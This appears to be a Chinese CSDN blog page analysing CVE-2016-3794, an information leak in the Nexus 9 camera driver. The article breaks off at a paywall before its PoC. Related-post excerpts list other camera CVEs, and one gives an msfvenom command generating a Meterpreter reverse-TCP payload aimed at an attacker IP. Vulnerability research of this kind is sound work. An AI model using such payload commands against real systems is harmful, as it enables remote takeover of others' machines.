Nexus 9 摄像头驱动中的信息泄漏漏洞(CVE-2016-3794)分析

最新推荐文章于 2024-04-25 09:15:00 发布
最新推荐文章于 2024-04-25 09:15:00 发布
阅读量1.4k 收藏
点赞数
分类专栏: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ycqzsy/article/details/52061353
版权
本文深入分析了Nexus 9摄像头驱动中的信息泄漏漏洞CVE-2016-3794,探讨了驱动加载过程、ioctl攻击向量以及漏洞成因。通过用户空间调用ioctl,利用driver的camera_ioctl函数,当特定条件满足时,可能导致内存信息泄漏。分析此漏洞旨在理解Android驱动漏洞原理,为相关安全研究提供参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

最近几个月的谷歌Android安全公告中,第三方驱动的漏洞占据了相当大的比例。由于驱动运行在内核空间,如果它出现问题,将导致非常大的影响。

所以,Android驱动漏洞值得我们去关注,但是这方面的资料缺比较少。本文分析了一个存在于Nexus 9摄像头驱动中的信息泄漏漏洞,首先描述了驱动的加载过程,其次讲解了漏洞的攻击向量,最后结合poc分析了漏洞的成因。

驱动的加载

摄像头驱动的源码位于参考文献[1]。

不同于普通的驱动,摄像头驱动是一个platform driver。它使用module_platform_driver宏作为指定名称的平台设备驱动注册函数和平台设备驱动注销函数。

无标题.png

module_platform_driver最终会调用 platform_driver 结构元素 probe 函数指针,如果想详细了解其过程,请参考文献[2]。

最低0.47元/天 解锁文章
【最新漏洞预警】天王级视频监控产品某华认证绕过漏洞CVE-2021-330*复现与分析
QTcyber的博客
11-12 6898
1.引言 某华是全球占有率排名第二的视频监控品牌。2021年10月,多款摄像产品曝光了认证绕过漏洞,攻击者可利用该漏洞绕过身份验证,获得设备管理权限,可对摄像头进行配置修改、获取配置信息、修改口令、重启设备、添加用户等,危害很高,影响IPC/VTH/VTO/NVR/DVR等主流产品。 2.漏洞复现 根据github上POC中的`requirements.txt`搭建环境: sudo pip3 install -r requirements.txt 运行`Console.py`,登陆方式选择`l
看雪『Android安全』板块 2018 年优秀和精华帖分类索引
墨鱼菜鸡
07-11 960
转载:https://bbs.pediy.com/thread-249602.htm [推荐]『Android安全』版2018年优秀和精华帖分类索引 文章筛选和评价仅代表个人观点,欢迎指正。 列表不定期更新,欢迎自荐~ 2018年 1.逆向技术基础 Frida操作手册-Android环境准备 Frida hook方便快捷,并且跨平台,可以学习一...
海康摄像头CVE-2021-36260漏洞复现
A_991128a的博客
04-25 2603
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息
Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现
渗透测试研究中心
03-20 842
0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3...
网络摄像头CVE
weixin_33889665的博客
06-17 536
CVE-2018-9995 rtsp未授权访问 转载于:https://www.cnblogs.com/AtesetEnginner/p/11038980.html
使用Onvif协议进行设备发现以及指定设备信息探测
xcyle的口袋
08-12 1万+
首先,我们要了解Onvif协议,https://www.onvif.org/这里我们之探讨如何使用gsoap进行onvif客户端的开发,关于gsoap的onvif框
谈Fuzz技术挖掘Android漏洞
一起来捉 Bug 呀~~
03-13 2599
作者:刘朋,NICP国家安全重点实验室成员,优快云博客专家,2016年博客之星。“白帽子”,如今已经向多家手机厂商,包括Google小米、魅族等提交高危漏洞。另外也主导开发了两款App,其中主导开发“妙趣剪纸”已登录苹果体验店。 声明:本文为《程序员》原创文章,未经允许不得转载,更多精彩文章请订阅 2017 年《程序员》 【优快云 有奖征稿啦】技术之路,共同进步,有优质移动开...
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1177
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
centOS7.4中Wget高危漏洞 CVE-2017-13090 高危、CVE-2017-13089 高危
ky1in93的博客
04-27 3393
简介:GNU Wget是GNU计划开发的一套用于在网络上进行下载的自由软件,它支持通过HTTP、HTTPS以及FTP这三个最常见的TCP/IP协议下载。 GNU Wget 1.19.2之前的版本中存在缓冲区溢出漏洞。远程攻击者可利用该漏洞在受影响的应用程序上下文中执行任意代码或造成拒绝服务。 解决方案:请直接在漏洞处理页面,选择对应服务器和漏洞,生成修复命令后,登录到服务器上运行即可。使用命令:...
海康威视(Hikvision)大规模代码执行漏洞 数万监控设备存风险
热门推荐
一点一滴积累!
04-01 3万+
1. 更新情况 2014年11月19日,海康威视(Hikvision)监控设备被爆严重漏洞,具体编号为CVE-2014-4878、CVE-2014-4879CVE-2014-4880。这三个漏洞都是由于Hikvision监控设备对RTSP(实时流传输协议)请求处理不当导致的,通过该漏洞攻击者可以对设备进行DoS,甚至直接获取设备的最高权限。2. 漏洞概要 a) 漏洞描述 海
Android内核中打印backtrace的方法
Michael23的专栏
10-27 850
To print the stack contents and a backtrace to the kernel log, use the dump_stack() function in your kernel module. It's declared in linux/kernel.h in the include folder in the kernel source direc
arm32下对象数组的逆向分析
Michael23的专栏
03-17 829
0x0 概述 最近学习arm32的逆向分析,写了一些代码,对照着汇编看。下边分析了对象数组的汇编实现。 0x1 c语言 c语言代码如下:#include class CNumber{ public: CNumber(){ m_nNumber=1; m_fNumber=0.1; }
arm32下根据虚函数识别全局对象
Michael23的专栏
03-23 585
0x0 概述 本文描述了arm32汇编下,如何通过识别虚函数进而实现全局对象的识别。 0x1 c代码 #include class CGlobal{ public: CGlobal(){ printf("CGLoabla \r\n"); }
arm32下继承与多态的逆向分析
Michael23的专栏
03-24 449
0x0 概述 本文分析了arm32下继承与多态在内存中的表现形式,得到构造函数和析构函数的另外一个识别条件,并且获得了多态的实现原理。 0x1 c代码 #include class Person{ public: Person(){ printf("Person() \r\n"); } virtual ~Per
htmlagilitypack.1.11.62.zip
04-13
htmlagilitypack.1.11.62
第14届蓝桥杯嵌入式省赛题大题代码+自做未评测
最新发布
04-13
蓝桥杯第14届蓝桥杯嵌入式省赛题大题代码+自做未评测应该会有点错误的
C# WPF智慧工厂数据平台开发:从MVVM架构到工业组件应用
04-13
内容概要:本文详细介绍了基于C#和WPF构建智慧工厂数据平台的方法和技术要点。首先阐述了WPF的核心设计理念MVVM模式,展示了如何将界面逻辑与业务逻辑分离,使代码更加清晰易维护。接着讨论了工厂看板的数据可视化,包括使用LiveCharts库创建各类统计图表。随后讲解了页面布局技巧,如利用Grid、DockPanel等进行模块化设计。此外,探讨了通过动画效果提升用户体验的具体方法,以及工业组件的专业化设计,如模拟工业设备按钮和指示灯。文中还涉及MES开发中的数据采集与处理,介绍如何通过PLC Communications Toolkit实现与PLC的通信。最后讲述了数据库集成的相关内容,包括使用Entity Framework进行数据操作。 适合人群:对C#和WPF有一定了解并希望深入学习智慧工厂数据平台开发的技术人员。 使用场景及目标:适用于正在参与或计划开展智慧工厂项目的开发者,旨在帮助他们掌握从架构搭建到具体功能实现的全过程,提高开发效率和产品质量。 其他说明:文章不仅提供了理论指导,还附带了大量的实际代码示例,便于读者理解和实践。同时强调了工业应用场景下的特殊需求,如稳定性、实时性和实用性。
分析Windows AFD驱动本地提权漏洞CVE-2023-21768
漏洞存在于AFD驱动程序处理用户模式发起的I/O操作过程中,尤其是针对输入/输出控制(IOCTL)请求的处理。 漏洞的原理是由于AFD驱动程序在处理某些IOCTL请求时存在逻辑错误,这可能导致安全检查被绕过。当攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值